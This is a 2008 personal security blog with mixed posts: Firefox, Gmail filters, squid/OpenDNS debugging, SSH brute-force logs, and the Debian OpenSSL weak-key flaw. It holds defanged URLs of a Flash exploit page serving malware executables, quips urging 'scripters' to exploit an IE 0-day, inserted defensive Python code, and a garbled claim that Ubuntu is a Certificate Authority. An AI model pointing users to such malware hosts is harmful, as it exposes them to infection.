I should have because now they took you, after your screaming alarmed the neighbor, after your neighbor alarmed the police, after the police kicked in the door, after the police warned the ambulance, after the ambulance took you away, after the police took your cellphone, after the doctors called that after the first operation they saw little hope, and after I tried to contact your daughter, and after the second call from the doctors who said there was little hope and after that I found your daughter was informed... but all was too late.
All was too late, but disaster, 'cause it was too early. It should not have been.
Kiek, I should have...
Thursday 19 June 2008
BackTrack3 to be released, RSN
Ever since I met Max at some stint at a client, I have been impressed with his bright mind and unbelievable control over the matters he works on. He did an assessment of the wlan setup I had designed and he pinpointed the weaknesses [some publicly known, others, well 'new'] and the strong points, which made up a nice report for management.
Anyway, BT3 is about to hit the tubes soon and now you know first :P
Wednesday 18 June 2008
Reasons why I do...
So this couple look a good reason to spend a couple of euroos :D
Tuesday 17 June 2008
Reasons I do not.

Firefox 3 is about to hit the Internet tubes in a couple of hours. Great, or is it?
The fact that the Google Browser Sync project is not taking calls nor displaying any word about support of their essential FF extension for FF 3 has made me decide to NOT upgrade.
As much as I liked test driving FF3 [all betas and RCs] I just do not want to browse without GBS, unless I am given no option.
So here are my apologies to the FireFox 3 team: sorry! But I will retract my pledge to download FF3 until GBS is available and will continue to use FF2.
Here's the Google team's reply:
Thanks for trying out Google Browser Sync and for all of your feedback. It was a tough call, but we decided to phase out support for Browser Sync. Since the team has moved on to other projects that are keeping them busy, we don't have time to update the extension to work with Firefox 3 or to continue to maintain it.
For those of you who want to continue to use Firefox 2, we'll maintain support for old versions of Google Browser Sync through 2008. After that, we can recommend a few other products that scratch a similar itch. We hope that one of them works for you:
Mozilla Weave [labs.mozilla.com] from Mozilla Labs—Offers bookmark and history synchronization across computers.
Google Toolbar for Firefox [toolbar.google.com]—Store your bookmarks online and access them from any computer online.
Foxmarks Bookmark Synchronizer [addons.mozilla.org]—Synchronizes your bookmarks across all computers where it is installed.
Regards,
The Google Team
But personally I do not want to change too much at a time so I will sit back, enjoy GBS for the coming couple of months, wait till FF3's bugs are ironed out and then, maybe, switch away from GBS to one of the above mentioned 'replacements'.
Friday 30 May 2008
This is sweet :D
Get it here. Thank Zac Bedell.
Wednesday 28 May 2008
Flash: the format everybody loves to hate [at least should]
http://www. play0nlnie. com/pcd/topics/ff11us/20080311cPxl31/07.jpg
That in the end, downloads:
http://www. play0nlnie. com/ax.exe
&
http://www. play0nlnie. com/setip.exe
Virustotal was 7/31 for ax.exe, and 7/31 for setip.exe earlier this evening.
Google gives a cool 359 results for the quoted string "Adobe Flash Player SWF File Unspecified Remote Code Execution Vulnerability" so word's out.
Tuesday 27 May 2008
Arun Sarin is leaving Vodafone
We lost the most out of touch CEO ever, whose ideas, visions and quotes were always mindbending.
Thursday 22 May 2008
gmail filter multiple domains

For some time I have been wondering about how to implement my own idea of a zero inbox, and at the same time keep my filters in gmail clean and mean.
It took me a couple of searches to find the answer. It's simple:
You can separate the domains|names with a vertical bar '|' but not with a comma or the 'OR' operator. Well, actually you can use the good old 'OR' clause but then you need to use the '(' and ')' like so:
Matches: from:((@komplett.nl OR @4launch.nl OR @livinstyle.nl OR @marketing.rackspace.co.uk OR @youthink.com OR @sourceforge.net OR @klm-email.com OR @service.swiss.com OR @dienstmakkers.nl OR @amsterdam.nl OR @honestreporting.com OR @ziki.com OR @opendns.com OR @marketing.rackspace.co.uk OR @enews.sierra-news.com OR @rapidshare.com OR @weekly.gamespy.com OR @nts.nl OR @nintendo-europe.com OR @dienstmakkers.nl OR @ajax.nl OR @komplett.nl OR @bol.com OR @service.swiss.com OR @sans.org OR @videoland.nl OR @sovereignlife.com OR @amsterdam.nl OR @nts.nl OR @20min.ch OR @ringtonio.nl OR @2dehands.nl OR @4launch.nl OR @klm-email.com OR @davinciteam.com OR @mail.expedia.nl OR @looki.de OR @global-conflict.org OR @i3d.net OR @ebay.de OR @db2.myorc.com OR @mashmaker.intel.com OR @xing.com OR @firebrandtraining.co.uk OR @ipswitchmail.com OR @marktplaats.nl))
Do this: Skip Inbox, Apply label "XXX"
Nice. Inbox down to (243) unreads that I actually might read, one day... unless they're caught by my 'sorry, no time' filter that somehow flagged the message by triage as "dead wood".
Photo by Code Poet
Monday 19 May 2008
Times are changing...

I am from the time that dental correction was only cool when done invisibly. You would have your holes plugged, most of the time with 'amagaan' but that was for the poor [me]. The cooler people used plastic in the colour of their teeth.
Nowadays my kids _die_ for a super visible dental correction. The more 'bling' the better.
A good thing, in my book.
Friday 16 May 2008
SSH brute force botnet
May 11 02:41:53 meij sshd[23046]: Failed keyboard-interactive/pam for invalid user tomcat from 168.243.236.228 port 56131 ssh2
May 11 04:36:27 meij sshd[23490]: Failed keyboard-interactive/pam for invalid user tsc from 190.12.74.11 port 57240 ssh2
May 11 07:07:29 meij sshd[24482]: Failed keyboard-interactive/pam for invalid user chang from 66.159.198.155 port 51730 ssh2
May 11 19:41:47 meij sshd[27408]: Failed keyboard-interactive/pam for invalid user backup from 196.211.44.154 port 12491 ssh2
May 11 19:42:58 meij sshd[27411]: Failed keyboard-interactive/pam for invalid user backup from 193.224.140.35 port 57552 ssh2
May 11 21:09:33 meij sshd[27738]: Failed keyboard-interactive/pam for invalid user postgres from 66.159.198.155 port 59462 ssh2
May 12 01:37:24 meij sshd[29026]: Failed keyboard-interactive/pam for invalid user thomas from 193.224.140.35 port 57325 ssh2
May 12 02:40:33 meij sshd[29258]: Failed keyboard-interactive/pam for invalid user franky from 66.193.161.130 port 49501 ssh2
May 12 03:20:11 meij sshd[29421]: Failed keyboard-interactive/pam for invalid user majordomo from 66.159.198.155 port 49959 ssh2
May 12 03:40:57 meij sshd[29482]: Failed keyboard-interactive/pam for invalid user shop from 212.24.179.54 port 42187 ssh2
May 12 03:58:24 meij sshd[29541]: Failed keyboard-interactive/pam for invalid user thisuserdoesnotexists from 88.191.50.77 port 58021 ssh2
[... snip ...]
May 14 01:35:26 meij sshd[14831]: Failed keyboard-interactive/pam for invalid user orant from 66.162.98.185 port 45112 ssh2
May 14 01:41:32 meij sshd[14846]: Failed keyboard-interactive/pam for invalid user appen from 66.122.59.6 port 47129 ssh2
May 14 01:56:11 meij sshd[14904]: Failed keyboard-interactive/pam for invalid user bohmbach from 74.238.169.202 port 39950 ssh2
May 14 02:00:10 meij sshd[14947]: Failed keyboard-interactive/pam for invalid user braun from 72.254.69.226 port 2861 ssh2
May 14 02:03:16 meij sshd[14973]: Failed keyboard-interactive/pam for invalid user buesing from 211.232.103.213 port 29070 ssh2
May 14 02:04:40 meij sshd[14976]: Failed keyboard-interactive/pam for invalid user conrad from 213.134.152.66 port 3523 ssh2
May 14 02:08:27 meij sshd[14989]: Failed keyboard-interactive/pam for invalid user dregenus from 194.94.205.135 port 49358 ssh2
May 14 02:09:29 meij sshd[14992]: Failed keyboard-interactive/pam for invalid user duelsen from 85.207.127.98 port 44080 ssh2
May 14 02:14:26 meij sshd[15006]: Failed keyboard-interactive/pam for invalid user fellechn from 213.134.152.66 port 1294 ssh2
May 14 02:15:54 meij sshd[15033]: Failed keyboard-interactive/pam for invalid user fellechn from 74.238.205.245 port 47536 ssh2
May 14 02:17:27 meij sshd[15036]: Failed keyboard-interactive/pam for invalid user friebe from 69.15.172.22 port 2162 ssh2
May 14 02:20:52 meij sshd[15048]: Failed keyboard-interactive/pam for invalid user friese from 62.2.211.46 port 28917 ssh2
May 14 02:22:13 meij sshd[15051]: Failed keyboard-interactive/pam for invalid user fuhrhop from 217.7.233.155 port 58495 ssh2
May 14 02:24:51 meij sshd[15063]: Failed keyboard-interactive/pam for invalid user geffers from 64.73.250.213 port 45064 ssh2
May 14 02:26:40 meij sshd[15066]: Failed keyboard-interactive/pam for invalid user geffers from 221.8.255.134 port 42398 ssh2
[end.]
1209 attempts for 654 "invalid users" in 49 busy hours from [grep "invalid user" /var/log/messages | awk -F" " '{ print $13 }' | sort | uniq -u | wc] 53 unique addresses. Not bad. Slipped below my denyhosts radar just nicely.
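Why a scan like this stays under a per-host counter, as an added example (not the author's tooling): the script below compares what a per-source threshold sees with two aggregate signals, many quiet sources inside one time window and the same username retried from a different address. The sample log is constructed in the format of the excerpt above, and the thresholds, window sizes and function names are assumptions. `count_sources` also shows that `sort | uniq -u` counts only addresses seen exactly once, while `sort -u` counts every distinct address.

```python
import re
from collections import Counter
from datetime import datetime, timedelta

# Constructed sample in the sshd format of the excerpt above. Addresses are
# RFC 5737 documentation ranges, not the hosts from the post.
SAMPLE_LOG = """\
May 14 02:00:10 meij sshd[14947]: Failed keyboard-interactive/pam for invalid user braun from 192.0.2.10 port 2861 ssh2
May 14 02:03:16 meij sshd[14973]: Failed keyboard-interactive/pam for invalid user buesing from 198.51.100.7 port 29070 ssh2
May 14 02:04:40 meij sshd[14976]: Failed keyboard-interactive/pam for invalid user conrad from 203.0.113.66 port 3523 ssh2
May 14 02:08:27 meij sshd[14989]: Failed keyboard-interactive/pam for invalid user dregenus from 192.0.2.135 port 49358 ssh2
May 14 02:14:26 meij sshd[15006]: Failed keyboard-interactive/pam for invalid user fellechn from 203.0.113.66 port 1294 ssh2
May 14 02:15:54 meij sshd[15033]: Failed keyboard-interactive/pam for invalid user fellechn from 198.51.100.245 port 47536 ssh2
May 14 02:24:51 meij sshd[15063]: Failed keyboard-interactive/pam for invalid user geffers from 192.0.2.10 port 45064 ssh2
May 14 02:26:40 meij sshd[15066]: Failed keyboard-interactive/pam for invalid user geffers from 203.0.113.134 port 42398 ssh2
May 14 02:30:01 meij cron[15100]: (root) CMD (run-parts /etc/cron.hourly)
May 14 14:10:01 meij sshd[17001]: Failed keyboard-interactive/pam for invalid user admin from 198.51.100.99 port 40001 ssh2
May 14 14:10:03 meij sshd[17003]: Failed keyboard-interactive/pam for invalid user test from 198.51.100.99 port 40002 ssh2
May 14 14:10:05 meij sshd[17005]: Failed keyboard-interactive/pam for invalid user guest from 198.51.100.99 port 40003 ssh2
May 14 14:10:07 meij sshd[17007]: Failed keyboard-interactive/pam for invalid user oracle from 198.51.100.99 port 40004 ssh2
May 14 14:10:09 meij sshd[17009]: Failed keyboard-interactive/pam for invalid user webmaster from 198.51.100.99 port 40005 ssh2
"""

LINE_RE = re.compile(
    r"^(?P<ts>\w{3}\s+\d+ \d\d:\d\d:\d\d) \S+ sshd\[\d+\]: "
    r"Failed \S+ for invalid user (?P<user>\S+) "
    r"from (?P<ip>\d{1,3}(?:\.\d{1,3}){3}) port \d+"
)


def parse(log_text, year=2008):
    """Return sorted (timestamp, user, ip) tuples; non-matching lines are skipped."""
    events = []
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if m:
            # syslog omits the year, so it has to be supplied
            ts = datetime.strptime(f"{year} {m['ts']}", "%Y %b %d %H:%M:%S")
            events.append((ts, m["user"], m["ip"]))
    return sorted(events)


def per_source_offenders(events, threshold):
    """What a per-host counter sees: sources with at least `threshold` failures."""
    counts = Counter(ip for _, _, ip in events)
    return {ip: n for ip, n in counts.items() if n >= threshold}


def count_sources(events):
    """(distinct addresses, addresses seen exactly once)."""
    per_ip = Counter(ip for _, _, ip in events)
    return len(per_ip), sum(1 for n in per_ip.values() if n == 1)


def distributed_scan(events, window=timedelta(hours=1), min_sources=4,
                     per_source_limit=5):
    """Busiest window in which many sources each stay under the per-host limit."""
    best = None
    for i, (start, _, _) in enumerate(events):
        in_window = [e for e in events[i:] if e[0] - start <= window]
        per_ip = Counter(ip for _, _, ip in in_window)
        # Sources at or over the limit would already be caught per host.
        quiet = {ip: n for ip, n in per_ip.items() if n < per_source_limit}
        if len(quiet) < min_sources:
            continue
        summary = {
            "start": start,
            "sources": len(quiet),
            "attempts": sum(quiet.values()),
            "users": len({u for _, u, ip in in_window if ip in quiet}),
            "max_per_source": max(quiet.values()),
        }
        rank = (summary["sources"], summary["attempts"])
        if best is None or rank > (best["sources"], best["attempts"]):
            best = summary
    return best


def handoffs(events, max_gap=timedelta(minutes=10)):
    """Same username retried from a different address within `max_gap`."""
    last, found = {}, []
    for ts, user, ip in events:
        prev = last.get(user)
        if prev and prev[1] != ip and ts - prev[0] <= max_gap:
            found.append((user, prev[1], ip))
        last[user] = (ts, ip)
    return found


if __name__ == "__main__":
    ev = parse(SAMPLE_LOG)
    print("per-host view :", per_source_offenders(ev, 5))
    print("sources       :", count_sources(ev))
    print("aggregate view:", distributed_scan(ev))
    print("handoffs      :", handoffs(ev))
```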
Thursday 15 May 2008
Euro 2008 champion: Russia
Switzerland - Czech Republic 2 - 1
Romania - France 0 - 2
Portugal - Turkey 1 - 1
Netherlands - Italy 3 - 2
Czech Republic - Portugal 2 - 1
Italy - Romania 2 - 1
Switzerland - Turkey 3 - 2
Netherlands - France 0 - 2
Switzerland - Portugal 1 - 2
Netherlands - Romania 2 - 1
Turkey - Czech Republic 0 - 0
France - Italy 1 - 2
Austria - Croatia 1 - 1
Spain - Russia 1 - 2
Germany - Poland 1 - 0
Greece - Sweden 1 - 3
Croatia - Germany 1 - 2
Sweden - Spain 0 - 2
Austria - Poland 3 - 1
Greece - Russia 1 - 2
Poland - Croatia 1 - 1
Greece - Spain 0 - 2
Austria - Germany 3 - 4
Russia - Sweden 2 - 1
Switzerland - Austria 3 - 1
Germany - Czech Republic 2 - 0
France - Spain 3 - 1
Russia - Italy 2 - 1
Switzerland - Germany 3 - 1
Spain - Russia 0 - 1
Switzerland - Russia 2 - 3
Euro 2008 champion: Russia
Speculation SSL Ubuntu & Thawte
And Ubuntu is Debian based
And Debian's SSL suffers from a giant randomness issue
And www.thawte.com runs on Ubuntu
And Ubuntu is a large Certificate Authority
Does that insinuate all Thawte certificates are ready for a review? :P
A great day for scripters!
First we have a crypto nub who decides to remove basically all randomness [the seed used for the PRNG (Pseudo Random Number Generator) used when creating SSL keys] from SSL in Debian. That did not happen last week, nor last month, not even last year, but on Tue May 2 16:34:53 2006 UTC. For reasons that have been mentioned over and over again, non-security people should not, repeat NOT, fiddle with security issues. Especially not packagers who just want things to install cleanly and silently. That bad.
In this case an unnamed individual did not like what he saw as uninitialized data, he removed one line:
MD_Update(&m,buf,j);
That was enough to limit the randomness of ALL SSL certificates [and thus also the SSH keys that are based on SSL] generated on these systems to 32,768 options [all possible PIDs on UNIX]. That sounds a lot to humans, to computers that is nothing and to crypto it is fcuk all. It is so small that all possible keys have been generated in about two hours for the 1024-bit DSA and 2048-bit RSA keys for x86. HD Moore used 31 Xeon cores clocked at 2.33GHz to do this.
Luckily for the researchers, HD Moore of metasploit moved quickly and created the OpenSSL Debian toolset WITHIN 24 HOURS[!!!] to toy with the issue.
Thank you. Scripters of the world: unite and have a ball!
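A toy model of why a seed space that small is fatal, added here as an illustration and not taken from OpenSSL, Debian or the toolset mentioned above: `ToyPRNG` and `toy_fingerprint` are hypothetical stand-ins built on SHA-256, and the only thing borrowed from the post is that the process ID is the sole input that still varies. Because every output can be enumerated, a defender can precompute the complete list of weak fingerprints and audit deployed keys against it.

```python
import hashlib

# The post's figure: every process ID a UNIX box could hand out.
PID_SPACE = 32768


class ToyPRNG:
    """Hash-counter generator built on SHA-256. It is NOT OpenSSL's PRNG;
    it models only the effect described above: with the mixing call removed,
    entropy supplied by the caller never reaches the state, only the PID does."""

    def __init__(self, pid, entropy=b"", mixing_removed=True):
        material = pid.to_bytes(2, "big")
        if not mixing_removed:
            material += entropy  # healthy build: caller entropy is mixed in
        self._state = hashlib.sha256(material).digest()
        self._counter = 0

    def read(self, n):
        """Return n pseudo-random bytes derived from the current state."""
        out = b""
        while len(out) < n:
            block = self._state + self._counter.to_bytes(8, "big")
            out += hashlib.sha256(block).digest()
            self._counter += 1
        return out[:n]


def toy_fingerprint(prng):
    """Stand-in for 'generate a key pair and fingerprint the public half'."""
    secret = prng.read(32)
    return hashlib.sha256(b"toy-public-key:" + secret).hexdigest()[:32]


def build_weak_list():
    """Every fingerprint the broken generator can ever produce, mapped to its PID."""
    return {toy_fingerprint(ToyPRNG(pid)): pid for pid in range(PID_SPACE)}


def audit(host_keys, weak_list):
    """Return {host: pid} for each deployed key found in the predictable set."""
    return {host: weak_list[fp] for host, fp in host_keys.items() if fp in weak_list}


def sample_fleet():
    """Constructed inventory: two hosts on the broken build, one on a fixed build.
    All three happened to generate their key in a process with PID 4242."""
    return {
        "web1": toy_fingerprint(ToyPRNG(4242, entropy=b"web1 boot noise")),
        "web2": toy_fingerprint(ToyPRNG(4242, entropy=b"web2 other noise")),
        "db1": toy_fingerprint(
            ToyPRNG(4242, entropy=b"db1 boot noise", mixing_removed=False)
        ),
    }


if __name__ == "__main__":
    weak = build_weak_list()
    fleet = sample_fleet()
    print("possible keys on the broken build:", len(weak))
    print("web1 and web2 share a key        :", fleet["web1"] == fleet["web2"])
    print("hosts needing new keys           :", audit(fleet, weak))
```

In the toy model, two unrelated hosts end up with the same key whenever their PIDs match, and the audit flags both while leaving the host on the fixed build alone.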
To bring the issues a little closer to your mom & pop [who hardly depend on SSH], Aviv Raff decided to post a real nice and nifty 0-day for IE. Scripters of the world, you know what to do.
This is a particularly nasty one, not just because it affects about 60% of all browsers in the world but also because our friends in Redmond just pushed out their monthly 'updates' so it will take at least another month before a patch is available, let alone the time it takes for mom & pop to actually update their IE.
So life is good, money there is to be made for us security people. Or is it?
Wednesday 14 May 2008
Beta testers wanted for FERRET

So what do you do when you made the headlines with your Ferret & Hamster releases in August 2007? You port Ferret [hamster too? Maybe? Please?] to the iPhone.
Now they are looking for beta testers with open iPhones. Feel up to the challenge?
Check here!
Happy Birthday Ha'Aretz!

Never will I forget how we met, how the initial moments were, how deeply I was moved by you and how profound an impact you made on me and my life.
It was a coincidence, no really, it was. It was not as if my life was aimed at that particular event, not that I was brought up to come to you, not that I had any known desire to experience you. It was purely coincidental that we met. Or was it? Was it not so that in my family your name was uttered in soft words of the highest respect? Was it not so that the 'coded' words my grandparents & parents whispered to each other, hidden from us kids, when saying goodbye, were words that ended with something like '...Jerusalem'?
It does not matter. Fact is, that on December the 27th, in the year 1989 you welcomed me. Fact is that ever since that day there is no place on earth that has touched me deeper, felt better, shines brighter than you.
Happy birthday, state of Israel. May you and your inhabitants live, prosper & find the peace and integrity you deserve.
Friday 9 May 2008
Maths is the music of reason

A musician wakes from a terrible nightmare. In his dream he finds himself in a society where music education has been made mandatory. “We are helping our students become more competitive in an increasingly sound-filled world.” Educators, school systems, and the state are put in charge of this vital project. Studies are commissioned, committees are formed, and decisions are made— all without the advice or participation of a single working musician or composer.
Since musicians are known to set down their ideas in the form of sheet music, these curious black dots and lines must constitute the “language of music.” It is imperative that students become fluent in this language if they are to attain any degree of musical competence; indeed, it would be ludicrous to expect a child to sing a song or play an instrument without having a thorough grounding in music notation and theory. Playing and listening to music, let alone composing an original piece, are considered very advanced topics and are generally put off until college, and more often graduate school.
As for the primary and secondary schools, their mission is to train students to use this language— to jiggle symbols around according to a fixed set of rules: “Music class is where we take out our staff paper, our teacher puts some notes on the board, and we copy them or transpose them into a different key. We have to make sure to get the clefs and key signatures right, and our teacher is very picky about making sure we fill in our quarter-notes completely. One time we had a chromatic scale problem and I did it right, but the teacher gave me no credit because I had the stems pointing the wrong way.”
In their wisdom, educators soon realize that even very young children can be given this kind of musical instruction. In fact it is considered quite shameful if one’s third-grader hasn’t completely memorized his circle of fifths. “I’ll have to get my son a music tutor. He simply won’t apply himself to his music homework. He says it’s boring. He just sits there staring out the window, humming tunes to himself and making up silly songs.”
In the higher grades the pressure is really on. After all, the students must be prepared for the standardized tests and college admissions exams. Students must take courses in Scales and Modes, Meter, Harmony, and Counterpoint. “It’s a lot for them to learn, but later in college when they finally get to hear all this stuff, they’ll really appreciate all the work they did in high school.” Of course, not many students actually go on to concentrate in music, so only a few will ever get to hear the sounds that the black dots represent. Nevertheless, it is important that every member of society be able to recognize a modulation or a fugal passage, regardless of the fact that they will never hear one. “To tell you the truth, most students just aren’t very good at music. They are bored in class, their skills are terrible, and their homework is barely legible. Most of them couldn’t care less about how important music is in today’s world; they just want to take the minimum number of music courses and be done with it. I guess there are just music people and non-music people. I had this one kid, though, man was she sensational! Her sheets were impeccable— every note in the right place, perfect calligraphy, sharps, flats, just beautiful. She’s going to make one hell of a musician someday.”
Waking up in a cold sweat, the musician realizes, gratefully, that it was all just a crazy dream. “Of course!” he reassures himself, “No society would ever reduce such a beautiful and meaningful art form to something so mindless and trivial; no culture could be so cruel to its children as to deprive them of such a natural, satisfying means of human expression. How absurd!”
Meanwhile, on the other side of town, a painter has just awakened from a similar nightmare…
***********
And all this leads us into a wonderfully written essay on how we are messing up the love and purity of math for our kids. Written by Paul Lockhart [and NO, that is NOT the space invader Paul Lockhart], an assistant professor at Brown who left to teach a mathematician's point of view to very young children. In his own words, "I want them to understand that there is a playground in their minds and that that is where mathematics happens. So far I have met with tremendous enthusiasm among the parents and kids, less so among the mid-level administrators." Is that so :P
BTW If anybody speaks to Paul, can you please ask him to start blogging or publishing more in any other way shape or form?
An eye opener and good read to boot. Enjoy it!
Thursday 8 May 2008
HELP: Linkedin removed my profile! [well, not mine, really]
Let's copy & paste that name, and CCIE serial, and repeat the search.
So I tried some Google-fu to see if more people had their profile removed by LinkedIn, but all I found was people who asked for themselves to be removed and happy faces that LinkedIn finally lets you remove links to people you once linked to. Silently, to make sure you piss nobody off :P
This is an interesting issue however.
I always check people's LinkedIn profiles when I do job interviews or have business meetings planned with people I do not know. It often helps to make sure you use the correct wording [or metaphors when clueless] when you know a little bit about their [public] background. I know many future employers do the same [Hi guys! I see you browse my profile before you call :D].
But what happens if you can't find that potential new employee on LinkedIn and you know nothing about her|him? Will it influence your initial selection on who to talk to and who not? I am sure it does for lots of companies. Never mind how smart that is, but it is done.
So what do you do when you drop off the most valuable professional showroom of the net? How does one prevent that from happening and having too big an impact on your money making abilities?
Wednesday 7 May 2008
Imagine being Vodafony and bending over Apple...
You get the left overs, the 2G countries, like: Australia, the Czech Republic, Egypt, Greece, Italy, India, Portugal, New Zealand, South Africa and Turkey. And those you get not even exclusively, muwaa!!!
Now, Arun Sarin has been labeled strange and basically clueless before. Being out of touch with reality really scares the shiit out of people working in his company but who knows, now that he found the way in to Apple's $ stream, maybe the good people working at Vodafone will get a break and develop something nice. Maybe. Then again it is more likely the big shot sees no need for cool iPhone apps and will be happy with the pennies and cents he is allowed to keep for the devices he sells, business as usual.
Tuesday 6 May 2008
opendns resolve issue? no, it's squid.
For reasons only known to my shrink, I wanted Firefox to use a tunnel from a Windows XP machine to an OpenSuse linux host resolving via OpenDNS and squid to make things complete. Funny stuff, that I do just because I can.
It is all really easy to get it up and running, nice to have your own tools on a sticky and funnel your wild browsing behavior encrypted to a known end point where you set it free into the world wild web. But trust is good, a functional test is better, but checking is better, as my audit teacher taught me. So the first thing I did was monitoring for data leakage on my local [windows host's] interface: nada. Schade.
Then I went to the remote host's interface to see what showed there: horror, nice! What I saw was part of the resolve queries going to my old and reliable [and we all hate reliable, right?] colocate DNS and part of the queries to OpenDNS. Hmm, makes you wonder. So checking the resolve file showed that I had correctly added the two opendns entries, and correctly removed the entries passed to the file via DHCP. I flushed the DNS cache, still no joy. Hmm, makes you wonder. Turned out it was squid not nicely obeying the new entries in the resolver file. Naughty squid!
My setup in more detail:
Firefox [2.0.14 on winXP SP2] well, actually it is FireFoxPortable on a 16Gb Flash Voyager.
putty [version 0.60] for a tunnel to an external host, listening on 127.0.0.1:8888, talking to 127.0.0.1:3128 where squid [Version 2.5.STABLE10] on Suse [2.6.13-15.18 i386]
I have added a boolean option into the URL "about:config" page in Firefox named "network.proxy.socks_remote_dns" and set it to true.
The resolver file on the remote host contains:
cat /etc/resolv.conf
### BEGIN INFO
# # Modified_by: dhcpcd
# Backup: /etc/resolv.conf.saved.by.dhcpcd.eth0
# Process: dhcpcd
# Process_id: 4326
# Script: /sbin/modify_resolvconf
# Saveto:
# Info: This is a temporary resolv.conf created by service dhcpcd.
# The previous file has been saved and will be restored later.
# # If you don't like your resolv.conf to be changed, you
# can set MODIFY_{RESOLV,NAMED}_CONF_DYNAMICALLY=no. This # variables are placed in /etc/sysconfig/network/config.
# # You can also configure service dhcpcd not to modify it.
# # If you don't like dhcpcd to change your nameserver # settings
# then either set DHCLIENT_MODIFY_RESOLV_CONF=no
# in /etc/sysconfig/network/dhcp, or
# set MODIFY_RESOLV_CONF_DYNAMICALLY=no in
# /etc/sysconfig/network/config or (manually) use dhcpcd
# with -R. If you only want to keep your searchlist, set
# DHCLIENT_KEEP_SEARCHLIST=yes in /etc/sysconfig/network/dhcp or
# (manually) use the -K option.
# ### END INFO
nameserver 208.67.222.222
nameserver 208.67.220.220
And yes, I have set both options to 'no'
To clear the dns 'cache' I used:
/etc/init.d/nscd restart
What puzzled me is the following output when I use my local browser [that tunnels its requests to the remote host] and monitor the DNS queries on the remote host's interface [the remote host being my-host.xxx, my provider's dns server being lookup2.colo.xxx]:
tcpdump -p -i eth0 port 53
15:52:19.525862 IP my-host.xxx.33278 > lookup2.colo.xxx.domain: 28225+ A? mokumvonamsterdam.blogspot.com. (48)
15:52:19.526356 IP my-host.xxx.39176 > resolver1.opendns.com.domain: 28417+ PTR? 188.250.202.213.in-addr.arpa. (46)
15:52:19.542138 IP lookup2.colo.xxx.domain > my-host.xxx.33278: 28225 2/7/7[|domain]
15:52:19.739094 IP resolver1.opendns.com.domain > my-host.xxx.39176: 28417 1/0/0 (75)
15:52:19.739459 IP my-host.xxx.39176 > resolver1.opendns.com.domain: 17259+ PTR? 81.240.202.213.in-addr.arpa. (45)
15:52:19.949697 IP resolver1.opendns.com.domain > my-host.xxx.39176: 17259 1/0/0 (67)
15:52:19.950334 IP my-host.xxx.39176 > resolver1.opendns.com.domain: 48705+ PTR? 222.222.67.208.in-addr.arpa. (45)
15:52:19.973525 IP resolver1.opendns.com.domain > my-host.xxx.39176: 48705 1/0/0 (80)
15:52:20.698247 IP my-host.xxx.33278 > lookup2.colo.xxx.domain: 63234+ A? www.blogger.com. (33)
15:52:21.028751 IP lookup2.colo.xxx.domain > my-host.xxx.33278: 63234 2/7/7[|domain]
15:52:23.133656 IP my-host.xxx.33278 > lookup2.colo.xxx.domain: 57393+ A? www.youtube.com. (33)
15:52:23.134089 IP lookup2.colo.xxx.domain > my-host.xxx.33278: 57393 3/3/3 A youtube.com,[|domain]
15:52:23.134563 IP my-host.xxx.39176 > resolver1.opendns.com.domain: 51875+ PTR? 253.153.65.208.in-addr.arpa. (45)
15:52:23.157911 IP resolver1.opendns.com.domain > my-host.xxx.39176: 51875 1/0/0 (70)
15:52:24.315674 IP my-host.xxx.33278 > lookup2.colo.xxx.domain: 48709+ A? twitter.com. (29)
15:52:24.502987 IP lookup2.colo.xxx.domain > my-host.xxx.33278: 48709 1/5/5 A[|domain]
15:52:25.981131 IP my-host.xxx.33278 > lookup2.colo.xxx.domain: 25981+ A? www.google.com. (32)
15:52:25.981560 IP lookup2.colo.xxx.domain > my-host.xxx.33278: 25981 5/7/7 CNAME www.l.google.com.,[|domain]
15:52:28.057148 IP my-host.xxx.33278 > lookup2.colo.xxx.domain: 20445+ A? www.google-analytics.com. (42)
15:52:28.057758 IP lookup2.colo.xxx.domain > my-host.xxx.33278: 20445 5/7/7 CNAME[|domain]
15:52:29.280144 IP my-host.xxx.33278 > lookup2.colo.xxx.domain: 59181+ A? toolbarqueries.google.com. (43)
15:52:29.408904 IP lookup2.colo.xxx.domain > my-host.xxx.33278: 59181 5/7/7[|domain]
Turned out that I had to restart squid [/etc/init.d/squid restart] to make the resolving act nicely and forward _all_ lookups to opendns.com
16:12:04.543848 IP my-host.xxx.39176 > resolver1.opendns.com.domain: 8407+ A? mokumvonamsterdam.blogspot.com. (48)
16:12:04.567414 IP resolver1.opendns.com.domain > my-host.xxx.39176: 8407 2/0/0[|domain]
16:12:05.282740 IP my-host.xxx.39176 > resolver1.opendns.com.domain: 58294+ A? www.blogger.com. (33)
16:12:05.306651 IP resolver1.opendns.com.domain > my-host.xxx.39176: 58294 2/0/0 CNAME[|domain]
16:12:08.624282 IP my-host.xxx.39176 > resolver1.opendns.com.domain: 59333+ A? central.ujcfedweb.org. (39)
16:12:08.843032 IP resolver1.opendns.com.domain > my-host.xxx.39176: 59333 2/0/0 CNAME[|domain]
16:12:10.189203 IP my-host.xxx.39176 > resolver1.opendns.com.domain: 58807+ A? twitter.com. (29)
16:12:10.212537 IP resolver1.opendns.com.domain > my-host.xxx.39176: 58807 1/0/0 A 128.121.146.100 (45)
16:12:10.213033 IP my-host.xxx.39177 > resolver1.opendns.com.domain: 18146+ PTR? 100.146.121.128.in-addr.arpa. (46)
16:12:10.236480 IP resolver1.opendns.com.domain > my-host.xxx.39177: 18146 NXDomain 0/0/0 (46)
16:12:12.703541 IP my-host.xxx.39176 > resolver1.opendns.com.domain: 11197+ A? www.google.com. (32)
16:12:12.727000 IP resolver1.opendns.com.domain > my-host.xxx.39176: 11197 3/0/0 CNAME[|domain]
16:12:13.629888 IP my-host.xxx.39176 > resolver1.opendns.com.domain: 24465+ A? www.justsayhi.com. (35)
16:12:13.738147 IP resolver1.opendns.com.domain > my-host.xxx.39176: 24465 1/0/0 A 4.78.241.72 (51)
16:12:13.738702 IP my-host.xxx.39177 > resolver1.opendns.com.domain: 42572+ PTR? 72.241.78.4.in-addr.arpa. (42)
16:12:14.273047 IP resolver1.opendns.com.domain > my-host.xxx.39177: 42572 NXDomain 1/0/0 CNAME[|domain]
16:12:15.706642 IP my-host.xxx.39176 > resolver1.opendns.com.domain: 54172+ A? www.google-analytics.com. (42)
16:12:15.730274 IP resolver1.opendns.com.domain > my-host.xxx.39176: 54172 5/0/0 CNAME[|domain]
16:12:18.673145 IP my-host.xxx.39176 > resolver1.opendns.com.domain: 40629+ A? toolbarqueries.google.com. (43)
16:12:18.696662 IP resolver1.opendns.com.domain > my-host.xxx.39176: 40629 5/0/0[|domain]
Hope this helps someone trying to use opendns.com too.
